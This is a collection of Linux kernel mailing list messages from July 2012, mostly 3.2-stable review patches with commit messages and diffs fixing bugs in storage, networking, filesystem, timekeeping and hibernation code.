@@ -3516,6 +3531,9 @@ cifs_negotiate_rsize(struct cifs_tcon *tcon, struct 
smb_vol *pvolume_info)
if (!(server->capabilities & CAP_LARGE_READ_X))
rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
 
+   /* limit to the amount that we can kmap at once */
+   rsize = min_t(unsigned int, rsize, CIFS_KMAP_SIZE_LIMIT);
+
/* hard limit of CIFS_MAX_RSIZE */
rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH] Enable devtmpfs by default

2012-07-22 Thread Anton Blanchard

udev now requires CONFIG_DEVTMPFS so make it default to y.

I noticed this when booting a ppc64 pseries_defconfig on Fedora 17
and it paniced because it couldn't mount the root device.

Signed-off-by: Anton Blanchard 
---

Index: b/drivers/base/Kconfig
===
--- a/drivers/base/Kconfig
+++ b/drivers/base/Kconfig
@@ -24,6 +24,7 @@ config UEVENT_HELPER_PATH
 config DEVTMPFS
bool "Maintain a devtmpfs filesystem to mount at /dev"
depends on HOTPLUG
+   default y
help
  This creates a tmpfs/ramfs filesystem instance early at bootup.
  In this filesystem, the kernel driver core maintains device
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 060/108] target: Fix range calculation in WRITE SAME emulation when num blocks == 0

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Roland Dreier 

commit 1765fe5edcb83f53fc67edeb559fcf4bc82c6460 upstream.

When NUMBER OF LOGICAL BLOCKS is 0, WRITE SAME is supposed to write
all the blocks from the specified LBA through the end of the device.
However, dev->transport->get_blocks(dev) (perhaps confusingly) returns
the last valid LBA rather than the number of blocks, so the correct
number of blocks to write starting with lba is

dev->transport->get_blocks(dev) - lba + 1

(nab: Backport roland's for-3.6 patch to for-3.5)

Signed-off-by: Roland Dreier 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/target_core_cdb.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/target/target_core_cdb.c b/drivers/target/target_core_cdb.c
index 9888693..664f6e7 100644
--- a/drivers/target/target_core_cdb.c
+++ b/drivers/target/target_core_cdb.c
@@ -1095,7 +1095,7 @@ int target_emulate_write_same(struct se_cmd *cmd)
if (num_blocks != 0)
range = num_blocks;
else
-   range = (dev->transport->get_blocks(dev) - lba);
+   range = (dev->transport->get_blocks(dev) - lba) + 1;
 
pr_debug("WRITE_SAME UNMAP: LBA: %llu Range: %llu\n",
 (unsigned long long)lba, (unsigned long long)range);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 057/108] tcm_fc: Fix crash seen with aborts and large reads

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mark Rustad 

commit 3cc5d2a6b9a2fd1bf024aa5e52dd22961eecaf13 upstream.

This patch fixes a crash seen when large reads have their exchange
aborted by either timing out or being reset. Because the exchange
abort results in the seq pointer being set to NULL, because the
sequence is no longer valid, it must not be dereferenced. This
patch changes the function ft_get_task_tag to return ~0 if it is
unable to get the tag for this reason. Because the get_task_tag
interface provides no means of returning an error, this seems
like the best way to fix this issue at the moment.

Signed-off-by: Mark Rustad 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/tcm_fc/tfc_cmd.c |2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/target/tcm_fc/tfc_cmd.c b/drivers/target/tcm_fc/tfc_cmd.c
index f03fb97..5b65f33 100644
--- a/drivers/target/tcm_fc/tfc_cmd.c
+++ b/drivers/target/tcm_fc/tfc_cmd.c
@@ -230,6 +230,8 @@ u32 ft_get_task_tag(struct se_cmd *se_cmd)
 {
struct ft_cmd *cmd = container_of(se_cmd, struct ft_cmd, se_cmd);
 
+   if (cmd->aborted)
+   return ~0;
return fc_seq_exch(cmd->seq)->rxid;
 }
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 053/108] rt2x00usb: fix indexes ordering on RX queue kick

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Gruszka 

commit efd821182cec8c92babef6e00a95066d3252fda4 upstream.

On rt2x00_dmastart() we increase index specified by Q_INDEX and on
rt2x00_dmadone() we increase index specified by Q_INDEX_DONE. So entries
between Q_INDEX_DONE and Q_INDEX are those we currently process in the
hardware. Entries between Q_INDEX and Q_INDEX_DONE are those we can
submit to the hardware.

According to that fix rt2x00usb_kick_queue(), as we need to submit RX
entries that are not processed by the hardware. It worked before only
for empty queue, otherwise was broken.

Note that for TX queues indexes ordering are ok. We need to kick entries
that have filled skb, but was not submitted to the hardware, i.e.
started from Q_INDEX_DONE and have ENTRY_DATA_PENDING bit set.

>From practical standpoint this fixes RX queue stall, usually reproducible
in AP mode, like for example reported here:
https://bugzilla.redhat.com/show_bug.cgi?id=828824

Reported-and-tested-by: Franco Miceli 
Reported-and-tested-by: Tom Horsley 
Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
Signed-off-by: Ben Hutchings 
---
 drivers/net/wireless/rt2x00/rt2x00usb.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/rt2x00/rt2x00usb.c 
b/drivers/net/wireless/rt2x00/rt2x00usb.c
index d357d1e..74ecc33 100644
--- a/drivers/net/wireless/rt2x00/rt2x00usb.c
+++ b/drivers/net/wireless/rt2x00/rt2x00usb.c
@@ -436,8 +436,8 @@ void rt2x00usb_kick_queue(struct data_queue *queue)
case QID_RX:
if (!rt2x00queue_full(queue))
rt2x00queue_for_each_entry(queue,
-  Q_INDEX_DONE,
   Q_INDEX,
+  Q_INDEX_DONE,
   NULL,
   rt2x00usb_kick_rx_entry);
break;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 056/108] e1000e: Correct link check logic for 82571 serdes

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Tushar Dave 

commit d0efa8f23a644f7cb7d1f8e78dd9a223efa412a3 upstream.

SYNCH bit and IV bit of RXCW register are sticky. Before examining these bits,
RXCW should be read twice to filter out one-time false events and have correct
values for these bits. Incorrect values of these bits in link check logic can
cause weird link stability issues if auto-negotiation fails.

Reported-by: Dean Nelson 
Signed-off-by: Tushar Dave 
Reviewed-by: Bruce Allan 
Tested-by: Jeff Pieper 
Signed-off-by: Jeff Kirsher 
Signed-off-by: Ben Hutchings 
---
 drivers/net/ethernet/intel/e1000e/82571.c |3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/ethernet/intel/e1000e/82571.c 
b/drivers/net/ethernet/intel/e1000e/82571.c
index 36db4df..1f063dc 100644
--- a/drivers/net/ethernet/intel/e1000e/82571.c
+++ b/drivers/net/ethernet/intel/e1000e/82571.c
@@ -1572,6 +1572,9 @@ static s32 e1000_check_for_serdes_link_82571(struct 
e1000_hw *hw)
ctrl = er32(CTRL);
status = er32(STATUS);
rxcw = er32(RXCW);
+   /* SYNCH bit and IV bit are sticky */
+   udelay(10);
+   rxcw = er32(RXCW);
 
if ((rxcw & E1000_RXCW_SYNCH) && !(rxcw & E1000_RXCW_IV)) {
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 058/108] fifo: Do not restart open() if it already found a partner

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Anders Kaseorg 

commit 05d290d66be6ef77a0b962ebecf01911bd984a78 upstream.

If a parent and child process open the two ends of a fifo, and the
child immediately exits, the parent may receive a SIGCHLD before its
open() returns.  In that case, we need to make sure that open() will
return successfully after the SIGCHLD handler returns, instead of
throwing EINTR or being restarted.  Otherwise, the restarted open()
would incorrectly wait for a second partner on the other end.

The following test demonstrates the EINTR that was wrongly thrown from
the parent’s open().  Change .sa_flags = 0 to .sa_flags = SA_RESTART
to see a deadlock instead, in which the restarted open() waits for a
second reader that will never come.  (On my systems, this happens
pretty reliably within about 5 to 500 iterations.  Others report that
it manages to loop ~forever sometimes; YMMV.)

  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  #define CHECK(x) do if ((x) == -1) {perror(#x); abort();} while(0)

  void handler(int signum) {}

  int main()
  {
  struct sigaction act = {.sa_handler = handler, .sa_flags = 0};
  CHECK(sigaction(SIGCHLD, &act, NULL));
  CHECK(mknod("fifo", S_IFIFO | S_IRWXU, 0));
  for (;;) {
  int fd;
  pid_t pid;
  putc('.', stderr);
  CHECK(pid = fork());
  if (pid == 0) {
  CHECK(fd = open("fifo", O_RDONLY));
  _exit(0);
  }
  CHECK(fd = open("fifo", O_WRONLY));
  CHECK(close(fd));
  CHECK(waitpid(pid, NULL, 0));
  }
  }

This is what I suspect was causing the Git test suite to fail in
t9010-svn-fe.sh:

http://bugs.debian.org/678852

Signed-off-by: Anders Kaseorg 
Reviewed-by: Jonathan Nieder 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/fifo.c |9 -
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/fs/fifo.c b/fs/fifo.c
index b1a524d..cf6f434 100644
--- a/fs/fifo.c
+++ b/fs/fifo.c
@@ -14,7 +14,7 @@
 #include 
 #include 
 
-static void wait_for_partner(struct inode* inode, unsigned int *cnt)
+static int wait_for_partner(struct inode* inode, unsigned int *cnt)
 {
int cur = *cnt; 
 
@@ -23,6 +23,7 @@ static void wait_for_partner(struct inode* inode, unsigned 
int *cnt)
if (signal_pending(current))
break;
}
+   return cur == *cnt ? -ERESTARTSYS : 0;
 }
 
 static void wake_up_partner(struct inode* inode)
@@ -67,8 +68,7 @@ static int fifo_open(struct inode *inode, struct file *filp)
 * seen a writer */
filp->f_version = pipe->w_counter;
} else {
-   wait_for_partner(inode, &pipe->w_counter);
-   if(signal_pending(current))
+   if (wait_for_partner(inode, &pipe->w_counter))
goto err_rd;
}
}
@@ -90,8 +90,7 @@ static int fifo_open(struct inode *inode, struct file *filp)
wake_up_partner(inode);
 
if (!pipe->readers) {
-   wait_for_partner(inode, &pipe->r_counter);
-   if (signal_pending(current))
+   if (wait_for_partner(inode, &pipe->r_counter))
goto err_wr;
}
break;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 054/108] iwlegacy: always monitor for stuck queues

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Gruszka 

commit c2ca7d92ed4bbd779516beb6eb226e19f7f7ab0f upstream.

This is iwlegacy version of:

commit 342bbf3fee2fa9a18147e74b2e3c4229a4564912
Author: Johannes Berg 
Date:   Sun Mar 4 08:50:46 2012 -0800

iwlwifi: always monitor for stuck queues

If we only monitor while associated, the following
can happen:
 - we're associated, and the queue stuck check
   runs, setting the queue "touch" time to X
 - we disassociate, stopping the monitoring,
   which leaves the time set to X
 - almost 2s later, we associate, and enqueue
   a frame
 - before the frame is transmitted, we monitor
   for stuck queues, and find the time set to
   X, although it is now later than X + 2000ms,
   so we decide that the queue is stuck and
   erroneously restart the device

Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
[bwh: Backported to 3.2: adjust filename, function and variable names]
Signed-off-by: Ben Hutchings 
---
--- a/drivers/net/wireless/iwlegacy/iwl-core.c
+++ b/drivers/net/wireless/iwlegacy/iwl-core.c
@@ -1884,14 +1884,12 @@ void iwl_legacy_bg_watchdog(unsigned lon
return;
 
/* monitor and check for other stuck queues */
-   if (iwl_legacy_is_any_associated(priv)) {
-   for (cnt = 0; cnt < priv->hw_params.max_txq_num; cnt++) {
-   /* skip as we already checked the command queue */
-   if (cnt == priv->cmd_queue)
-   continue;
-   if (iwl_legacy_check_stuck_queue(priv, cnt))
-   return;
-   }
+   for (cnt = 0; cnt < priv->hw_params.max_txq_num; cnt++) {
+   /* skip as we already checked the command queue */
+   if (cnt == priv->cmd_queue)
+   continue;
+   if (iwl_legacy_check_stuck_queue(priv, cnt))
+   return;
}
 
mod_timer(&priv->watchdog, jiffies +


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 066/108] MIPS: Properly align the .data..init_task section.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: David Daney 

commit 7b1c0d26a8e272787f0f9fcc5f3e8531df3b3409 upstream.

Improper alignment can lead to unbootable systems and/or random
crashes.

[r...@linux-mips.org: This is a lond standing bug since
6eb10bc9e2deab06630261cd05c4cb1e9a60e980 (kernel.org) rsp.
c422a10917f75fd19fa7fe07023e384dae6f (lmo) [MIPS: Clean up linker script
using new linker script macros.] so dates back to 2.6.32.]

Signed-off-by: David Daney 
Cc: linux-m...@linux-mips.org
Patchwork: https://patchwork.linux-mips.org/patch/3881/
Signed-off-by: Ralf Baechle 
Signed-off-by: Ben Hutchings 
---
 arch/mips/include/asm/thread_info.h |4 ++--
 arch/mips/kernel/vmlinux.lds.S  |3 ++-
 2 files changed, 4 insertions(+), 3 deletions(-)

--- a/arch/mips/include/asm/thread_info.h
+++ b/arch/mips/include/asm/thread_info.h
@@ -60,6 +60,8 @@ struct thread_info {
 register struct thread_info *__current_thread_info __asm__("$28");
 #define current_thread_info()  __current_thread_info
 
+#endif /* !__ASSEMBLY__ */
+
 /* thread information allocation */
 #if defined(CONFIG_PAGE_SIZE_4KB) && defined(CONFIG_32BIT)
 #define THREAD_SIZE_ORDER (1)
@@ -97,8 +99,6 @@ register struct thread_info *__current_t
 
 #define free_thread_info(info) kfree(info)
 
-#endif /* !__ASSEMBLY__ */
-
 #define PREEMPT_ACTIVE 0x1000
 
 /*
--- a/arch/mips/kernel/vmlinux.lds.S
+++ b/arch/mips/kernel/vmlinux.lds.S
@@ -1,5 +1,6 @@
 #include 
 #include 
+#include 
 #include 
 
 #undef mips
@@ -73,7 +74,7 @@ SECTIONS
.data : {   /* Data */
. = . + DATAOFFSET; /* for CONFIG_MAPPED_KERNEL */
 
-   INIT_TASK_DATA(PAGE_SIZE)
+   INIT_TASK_DATA(THREAD_SIZE)
NOSAVE_DATA
CACHELINE_ALIGNED_DATA(1 << CONFIG_MIPS_L1_CACHE_SHIFT)
READ_MOSTLY_DATA(1 << CONFIG_MIPS_L1_CACHE_SHIFT)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 062/108] cifs: always update the inode cache with the results from a FIND_*

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Layton 

commit cd60042cc1392e79410dc8de9e9c1abb38a29e57 upstream.

When we get back a FIND_FIRST/NEXT result, we have some info about the
dentry that we use to instantiate a new inode. We were ignoring and
discarding that info when we had an existing dentry in the cache.

Fix this by updating the inode in place when we find an existing dentry
and the uniqueid is the same.

Reported-and-Tested-by: Andrew Bartlett 
Reported-by: Bill Robertson 
Reported-by: Dion Edwards 
Signed-off-by: Jeff Layton 
Signed-off-by: Steve French 
Signed-off-by: Ben Hutchings 
---
 fs/cifs/readdir.c |7 +--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c
index 0a8224d..a4217f0 100644
--- a/fs/cifs/readdir.c
+++ b/fs/cifs/readdir.c
@@ -86,9 +86,12 @@ cifs_readdir_lookup(struct dentry *parent, struct qstr *name,
 
dentry = d_lookup(parent, name);
if (dentry) {
-   /* FIXME: check for inode number changes? */
-   if (dentry->d_inode != NULL)
+   inode = dentry->d_inode;
+   /* update inode in place if i_ino didn't change */
+   if (inode && CIFS_I(inode)->uniqueid == fattr->cf_uniqueid) {
+   cifs_fattr_to_inode(inode, fattr);
return dentry;
+   }
d_drop(dentry);
dput(dentry);
}


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 067/108] UBIFS: fix a bug in empty space fix-up

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Artem Bityutskiy 

commit c6727932cfdb13501108b16c38463c09d5ec7a74 upstream.

UBIFS has a feature called "empty space fix-up" which is a quirk to work-around
limitations of dumb flasher programs. Namely, of those flashers that are unable
to skip NAND pages full of 0xFFs while flashing, resulting in empty space at
the end of half-filled eraseblocks to be unusable for UBIFS. This feature is
relatively new (introduced in v3.0).

The fix-up routine (fixup_free_space()) is executed only once at the very first
mount if the superblock has the 'space_fixup' flag set (can be done with -F
option of mkfs.ubifs). It basically reads all the UBIFS data and metadata and
writes it back to the same LEB. The routine assumes the image is pristine and
does not have anything in the journal.

There was a bug in 'fixup_free_space()' where it fixed up the log incorrectly.
All but one LEB of the log of a pristine file-system are empty. And one
contains just a commit start node. And 'fixup_free_space()' just unmapped this
LEB, which resulted in wiping the commit start node. As a result, some users
were unable to mount the file-system next time with the following symptom:

UBIFS error (pid 1): replay_log_leb: first log node at LEB 3:0 is not CS node
UBIFS error (pid 1): replay_log_leb: log error detected while replaying the log 
at LEB 3:0

The root-cause of this bug was that 'fixup_free_space()' wrongly assumed
that the beginning of empty space in the log head (c->lhead_offs) was known
on mount. However, it is not the case - it was always 0. UBIFS does not store
in it the master node and finds out by scanning the log on every mount.

The fix is simple - just pass commit start node size instead of 0 to
'fixup_leb()'.

Signed-off-by: Artem Bityutskiy 
Reported-by: Iwo Mergler 
Tested-by: Iwo Mergler 
Reported-by: James Nute 
Signed-off-by: Ben Hutchings 
---
 fs/ubifs/sb.c |8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/fs/ubifs/sb.c b/fs/ubifs/sb.c
index ef3d1ba..15e2fc5 100644
--- a/fs/ubifs/sb.c
+++ b/fs/ubifs/sb.c
@@ -718,8 +718,12 @@ static int fixup_free_space(struct ubifs_info *c)
lnum = ubifs_next_log_lnum(c, lnum);
}
 
-   /* Fixup the current log head */
-   err = fixup_leb(c, c->lhead_lnum, c->lhead_offs);
+   /*
+* Fixup the log head which contains the only a CS node at the
+* beginning.
+*/
+   err = fixup_leb(c, c->lhead_lnum,
+   ALIGN(UBIFS_CS_NODE_SZ, c->min_io_size));
if (err)
goto out;
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 065/108] md/raid1: close some possible races on write errors during resync

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit 58e94ae18478c08229626daece2fc108a4a23261 upstream.

commit 4367af556133723d0f443e14ca8170d9447317cb
   md/raid1: clear bad-block record when write succeeds.

Added a 'reschedule_retry' call possibility at the end of
end_sync_write, but didn't add matching code at the end of
sync_request_write.  So if the writes complete very quickly, or
scheduling makes it seem that way, then we can miss rescheduling
the request and the resync could hang.

Also commit 73d5c38a9536142e062c35997b044e89166e063b
md: avoid races when stopping resync.

Fix a race condition in this same code in end_sync_write but didn't
make the change in sync_request_write.

This patch updates sync_request_write to fix both of those.
Patch is suitable for 3.1 and later kernels.

Reported-by: Alexander Lyakas 
Original-version-by: Alexander Lyakas 
Signed-off-by: NeilBrown 
Signed-off-by: Ben Hutchings 
---
 drivers/md/raid1.c |   10 --
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
index 240ff31..cacd008 100644
--- a/drivers/md/raid1.c
+++ b/drivers/md/raid1.c
@@ -1818,8 +1818,14 @@ static void sync_request_write(struct mddev *mddev, 
struct r1bio *r1_bio)
 
if (atomic_dec_and_test(&r1_bio->remaining)) {
/* if we're here, all write(s) have completed, so clean up */
-   md_done_sync(mddev, r1_bio->sectors, 1);
-   put_buf(r1_bio);
+   int s = r1_bio->sectors;
+   if (test_bit(R1BIO_MadeGood, &r1_bio->state) ||
+   test_bit(R1BIO_WriteError, &r1_bio->state))
+   reschedule_retry(r1_bio);
+   else {
+   put_buf(r1_bio);
+   md_done_sync(mddev, s, 1);
+   }
}
 }
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 080/108] timekeeping: Maintain ktime_t based offsets for hrtimers

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Gleixner 

This is a backport of 5b9fe759a678e05be4937ddf03d50e950207c1c0

We need to update the hrtimer clock offsets from the hrtimer interrupt
context. To avoid conversions from timespec to ktime_t maintain a
ktime_t based representation of those offsets in the timekeeper. This
puts the conversion overhead into the code which updates the
underlying offsets and provides fast accessible values in the hrtimer
interrupt.

Signed-off-by: Thomas Gleixner 
Signed-off-by: John Stultz 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: 
http://lkml.kernel.org/r/1341960205-56738-4-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
[John Stultz: Backported to 3.2]
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |   25 -
 1 file changed, 24 insertions(+), 1 deletion(-)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 8958ad7..d5d0e5d 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -161,18 +161,34 @@ static struct timespec xtime __attribute__ ((aligned 
(16)));
 static struct timespec wall_to_monotonic __attribute__ ((aligned (16)));
 static struct timespec total_sleep_time;
 
+/* Offset clock monotonic -> clock realtime */
+static ktime_t offs_real;
+
+/* Offset clock monotonic -> clock boottime */
+static ktime_t offs_boot;
+
 /*
  * The raw monotonic time for the CLOCK_MONOTONIC_RAW posix clock.
  */
 static struct timespec raw_time;
 
 /* must hold write on xtime_lock */
+static void update_rt_offset(void)
+{
+   struct timespec tmp, *wtm = &wall_to_monotonic;
+
+   set_normalized_timespec(&tmp, -wtm->tv_sec, -wtm->tv_nsec);
+   offs_real = timespec_to_ktime(tmp);
+}
+
+/* must hold write on xtime_lock */
 static void timekeeping_update(bool clearntp)
 {
if (clearntp) {
timekeeper.ntp_error = 0;
ntp_clear();
}
+   update_rt_offset();
update_vsyscall(&xtime, &wall_to_monotonic,
 timekeeper.clock, timekeeper.mult);
 }
@@ -587,6 +603,7 @@ void __init timekeeping_init(void)
}
set_normalized_timespec(&wall_to_monotonic,
-boot.tv_sec, -boot.tv_nsec);
+   update_rt_offset();
total_sleep_time.tv_sec = 0;
total_sleep_time.tv_nsec = 0;
write_sequnlock_irqrestore(&xtime_lock, flags);
@@ -595,6 +612,12 @@ void __init timekeeping_init(void)
 /* time in seconds when suspend began */
 static struct timespec timekeeping_suspend_time;
 
+static void update_sleep_time(struct timespec t)
+{
+   total_sleep_time = t;
+   offs_boot = timespec_to_ktime(t);
+}
+
 /**
  * __timekeeping_inject_sleeptime - Internal function to add sleep interval
  * @delta: pointer to a timespec delta value
@@ -612,7 +635,7 @@ static void __timekeeping_inject_sleeptime(struct timespec 
*delta)
 
xtime = timespec_add(xtime, *delta);
wall_to_monotonic = timespec_sub(wall_to_monotonic, *delta);
-   total_sleep_time = timespec_add(total_sleep_time, *delta);
+   update_sleep_time(timespec_add(total_sleep_time, *delta));
 }
 
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 073/108] dm raid1: set discard_zeroes_data_unsupported

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mikulas Patocka 

commit 7c8d3a42fe1c58a7e8fd3f6a013e7d7b474ff931 upstream.

We can't guarantee that REQ_DISCARD on dm-mirror zeroes the data even if
the underlying disks support zero on discard.  So this patch sets
ti->discard_zeroes_data_unsupported.

For example, if the mirror is in the process of resynchronizing, it may
happen that kcopyd reads a piece of data, then discard is sent on the
same area and then kcopyd writes the piece of data to another leg.
Consequently, the data is not zeroed.

The flag was made available by commit 983c7db347db8ce2d8453fd1d89b7a4bb6920d56
(dm crypt: always disable discard_zeroes_data).

Signed-off-by: Mikulas Patocka 
Signed-off-by: Alasdair G Kergon 
Signed-off-by: Ben Hutchings 
---
 drivers/md/dm-raid1.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
index ea16984..b58b7a3 100644
--- a/drivers/md/dm-raid1.c
+++ b/drivers/md/dm-raid1.c
@@ -1084,6 +1084,7 @@ static int mirror_ctr(struct dm_target *ti, unsigned int 
argc, char **argv)
ti->split_io = dm_rh_get_region_size(ms->rh);
ti->num_flush_requests = 1;
ti->num_discard_requests = 1;
+   ti->discard_zeroes_data_unsupported = 1;
 
ms->kmirrord_wq = alloc_workqueue("kmirrord",
  WQ_NON_REENTRANT | WQ_MEM_RECLAIM, 0);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 055/108] iwlegacy: dont mess up the SCD when removing a key

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Emmanuel Grumbach 

commit b48d96652626b315229b1b82c6270eead6a77a6d upstream.

When we remove a key, we put a key index which was supposed
to tell the fw that we are actually removing the key. But
instead the fw took that index as a valid index and messed
up the SRAM of the device.

This memory corruption on the device mangled the data of
the SCD. The impact on the user is that SCD queue 2 got
stuck after having removed keys.

Reported-by: Paul Bolle 
Signed-off-by: Emmanuel Grumbach 
Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
[bwh: Backported to 3.2: adjust filename, context and variable name]
Signed-off-by: Ben Hutchings 
---
 drivers/net/wireless/iwlegacy/4965-mac.c |4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

--- a/drivers/net/wireless/iwlegacy/iwl-4965-sta.c
+++ b/drivers/net/wireless/iwlegacy/iwl-4965-sta.c
@@ -466,7 +466,7 @@ int iwl4965_remove_dynamic_key(struct iw
return 0;
}
 
-   if (priv->stations[sta_id].sta.key.key_offset == WEP_INVALID_OFFSET) {
+   if (priv->stations[sta_id].sta.key.key_flags & STA_KEY_FLG_INVALID) {
IWL_WARN(priv, "Removing wrong key %d 0x%x\n",
keyconf->keyidx, key_flags);
spin_unlock_irqrestore(&priv->sta_lock, flags);
@@ -483,7 +483,7 @@ int iwl4965_remove_dynamic_key(struct iw
sizeof(struct iwl4965_keyinfo));
priv->stations[sta_id].sta.key.key_flags =
STA_KEY_FLG_NO_ENC | STA_KEY_FLG_INVALID;
-   priv->stations[sta_id].sta.key.key_offset = WEP_INVALID_OFFSET;
+   priv->stations[sta_id].sta.key.key_offset = keyconf->hw_key_idx;
priv->stations[sta_id].sta.sta.modify_mask = STA_MODIFY_KEY_MASK;
priv->stations[sta_id].sta.mode = STA_CONTROL_MODIFY_MSK;
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 049/108] PM / Hibernate: Hibernate/thaw fixes/improvements

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bojan Smojver 

commit 5a21d489fd9541a4a66b9a500659abaca1b19a51 upstream.

 1. Do not allocate memory for buffers from emergency pools, unless
absolutely required. Do not warn about and do not retry non-essential
failed allocations.

 2. Do not check the amount of free pages left on every single page
write, but wait until one map is completely populated and then check.

 3. Set maximum number of pages for read buffering consistently, instead
of inadvertently depending on the size of the sector type.

 4. Fix copyright line, which I missed when I submitted the hibernation
threading patch.

 5. Dispense with bit shifting arithmetic to improve readability.

 6. Really recalculate the number of pages required to be free after all
allocations have been done.

 7. Fix calculation of pages required for read buffering. Only count in
pages that do not belong to high memory.

Signed-off-by: Bojan Smojver 
Signed-off-by: Rafael J. Wysocki 
Signed-off-by: Ben Hutchings 
---
 kernel/power/swap.c |   62 ---
